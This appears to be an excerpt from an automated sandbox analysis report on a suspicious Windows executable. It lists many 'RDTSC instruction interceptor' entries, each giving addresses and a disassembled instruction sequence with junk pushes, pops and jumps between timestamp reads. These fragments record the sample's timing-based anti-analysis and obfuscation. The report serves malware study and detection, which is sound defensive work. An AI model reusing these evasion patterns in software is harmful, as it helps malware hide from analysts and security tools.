                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C20D6B second address: C20D91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Eh 0x00000007 jmp 00007F0704B35544h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C20D91 second address: C20DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0704B3A4A9h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C20DB0 second address: C20DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C23BBD second address: C23BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A49Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C23BD5 second address: C23BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C23BDB second address: C23BE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F0704B3A496h 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C2388E second address: C23894 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3CBA6 second address: C3CBD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Dh 0x00000007 push eax 0x00000008 jmp 00007F0704B3A49Ah 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007F0704B3A496h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3CBD0 second address: C3CBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3BAF3 second address: C3BAFF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0704B3A496h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3BAFF second address: C3BB3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35547h 0x00000007 jmp 00007F0704B35549h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F0704B35554h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3BB3C second address: C3BB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A49Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3C780 second address: C3C786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3F72F second address: C3F734 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3F734 second address: C3F74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F0704B35544h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F0704B35536h 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3FA22 second address: C3FA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C3FA27 second address: C3FA31 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0704B3553Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: C4446C second address: C44485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A2h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC00AB second address: 4BC00D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, si 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC00D0 second address: 4BC0102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F0704B3A49Fh 0x00000010 mov ax, C6BFh 0x00000014 pop ecx 0x00000015 mov edx, 3B03AA78h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC0102 second address: 4BC0106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC0106 second address: 4BC010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC010A second address: 4BC0110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC0110 second address: 4BC0131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0704B3A4A1h 0x00000008 pop ecx 0x00000009 mov bh, 56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop edi 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0CD8 second address: 4BA0CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0CDC second address: 4BA0CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0CE0 second address: 4BA0CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0CE6 second address: 4BA0D1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, CE6Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0704B3A4A3h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0704B3A4A5h 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0D1E second address: 4BA0D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cl, EAh 0x0000000e pushad 0x0000000f mov bx, C2BAh 0x00000013 pushfd 0x00000014 jmp 00007F0704B3553Bh 0x00000019 and eax, 4F16EA5Eh 0x0000001f jmp 00007F0704B35549h 0x00000024 popfd 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0D72 second address: 4BA0D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0D76 second address: 4BA0D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B800C0 second address: 4B800C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B800C5 second address: 4B800CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B800CB second address: 4B800D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B800D8 second address: 4B80115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F0704B3553Ah 0x0000000b add ah, FFFFFFC8h 0x0000000e jmp 00007F0704B3553Bh 0x00000013 popfd 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F0704B35542h 0x0000001e pop ecx 0x0000001f mov edx, 7FB09EE6h 0x00000024 popad 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4B80115 second address: 4B80134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e mov ebx, eax 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ah, 8Ah 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0A71 second address: 4BA0A81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0704B3553Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0A81 second address: 4BA0A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0704B3A49Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0A9F second address: 4BA0AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0AA5 second address: 4BA0AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA05A7 second address: 4BA05BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov dx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA05BA second address: 4BA05BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA05BE second address: 4BA05C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA05C2 second address: 4BA05C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA05C8 second address: 4BA05F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0704B3553Eh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA05F5 second address: 4BA060B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, bx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0251 second address: 4BA0255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0255 second address: 4BA0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA0259 second address: 4BA025F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA025F second address: 4BA02B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0704B3A4A0h 0x0000000b add al, 00000028h 0x0000000e jmp 00007F0704B3A49Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F0704B3A4A9h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0704B3A49Dh 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA02B1 second address: 4BA02F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov esi, 40628539h 0x00000012 mov cl, 3Bh 0x00000014 popad 0x00000015 mov bh, C8h 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0704B35549h 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA02F1 second address: 4BA02F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB0193 second address: 4BB0199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BF0012 second address: 4BF0024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0704B3A49Eh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BF0024 second address: 4BF0028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BF0028 second address: 4BF0037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BF0037 second address: 4BF003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BF003B second address: 4BF0041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BF0041 second address: 4BF0046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC043C second address: 4BC0442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC0442 second address: 4BC0446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC0446 second address: 4BC0456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC0456 second address: 4BC045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC045B second address: 4BC04C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F0704B3A4A4h 0x00000010 movzx ecx, di 0x00000013 pop edi 0x00000014 mov dx, si 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007F0704B3A4A6h 0x0000001f mov eax, dword ptr [ebp+08h] 0x00000022 jmp 00007F0704B3A4A0h 0x00000027 and dword ptr [eax], 00000000h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F0704B3A49Ch 0x00000032 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BC04C5 second address: 4BC0507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushfd 0x00000008 jmp 00007F0704B3553Ch 0x0000000d or si, C838h 0x00000012 jmp 00007F0704B3553Bh 0x00000017 popfd 0x00000018 movzx ecx, di 0x0000001b popad 0x0000001c popad 0x0000001d and dword ptr [eax+04h], 00000000h 0x00000021 jmp 00007F0704B3553Bh 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov eax, edi 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA046C second address: 4BA049F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F0704B3A4A0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA049F second address: 4BA04A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BA04A3 second address: 4BA04A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE06C3 second address: 4BE06E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0704B3553Ch 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE06E7 second address: 4BE07E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0704B3A4A1h 0x00000009 add ah, 00000006h 0x0000000c jmp 00007F0704B3A4A1h 0x00000011 popfd 0x00000012 call 00007F0704B3A4A0h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F0704B3A4A1h 0x00000021 mov ebp, esp 0x00000023 jmp 00007F0704B3A49Eh 0x00000028 xchg eax, ecx 0x00000029 pushad 0x0000002a mov dl, cl 0x0000002c jmp 00007F0704B3A4A3h 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F0704B3A49Fh 0x0000003a adc cx, 8DFEh 0x0000003f jmp 00007F0704B3A4A9h 0x00000044 popfd 0x00000045 pushfd 0x00000046 jmp 00007F0704B3A4A0h 0x0000004b xor esi, 247C34F8h 0x00000051 jmp 00007F0704B3A49Bh 0x00000056 popfd 0x00000057 popad 0x00000058 xchg eax, ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F0704B3A49Bh 0x00000062 add esi, 689068BEh 0x00000068 jmp 00007F0704B3A4A9h 0x0000006d popfd 0x0000006e mov edx, eax 0x00000070 popad 0x00000071 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE07E7 second address: 4BE0803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0704B35548h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE0803 second address: 4BE0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [775F65FCh] 0x00000010 pushad 0x00000011 movzx eax, di 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 test eax, eax 0x00000019 pushad 0x0000001a jmp 00007F0704B3A4A9h 0x0000001f mov edi, eax 0x00000021 popad 0x00000022 je 00007F07774CD5BDh 0x00000028 pushad 0x00000029 pushad 0x0000002a movzx ecx, bx 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 mov dx, 8454h 0x00000034 popad 0x00000035 mov ecx, eax 0x00000037 pushad 0x00000038 push edi 0x00000039 mov ax, 7BBBh 0x0000003d pop eax 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F0704B3A4A7h 0x00000045 and cl, FFFFFF9Eh 0x00000048 jmp 00007F0704B3A4A9h 0x0000004d popfd 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE0893 second address: 4BE08BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor eax, dword ptr [ebp+08h] 0x00000009 jmp 00007F0704B3553Dh 0x0000000e and ecx, 1Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0704B3553Dh 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE08BB second address: 4BE08F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0704B3A4A7h 0x00000008 pop ecx 0x00000009 mov dh, 0Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ror eax, cl 0x00000010 jmp 00007F0704B3A4A0h 0x00000015 leave 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE08F4 second address: 4BE08F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE08F8 second address: 4BE08FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BE08FE second address: 4BE0992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [009A2014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F0708DB5D8Fh 0x00000024 push FFFFFFFEh 0x00000026 pushad 0x00000027 push ebx 0x00000028 pushfd 0x00000029 jmp 00007F0704B35548h 0x0000002e sbb ecx, 1AF4E718h 0x00000034 jmp 00007F0704B3553Bh 0x00000039 popfd 0x0000003a pop esi 0x0000003b popad 0x0000003c pop eax 0x0000003d pushad 0x0000003e mov bl, 46h 0x00000040 jmp 00007F0704B3553Eh 0x00000045 popad 0x00000046 ret 0x00000047 nop 0x00000048 push eax 0x00000049 call 00007F0708DB5DCDh 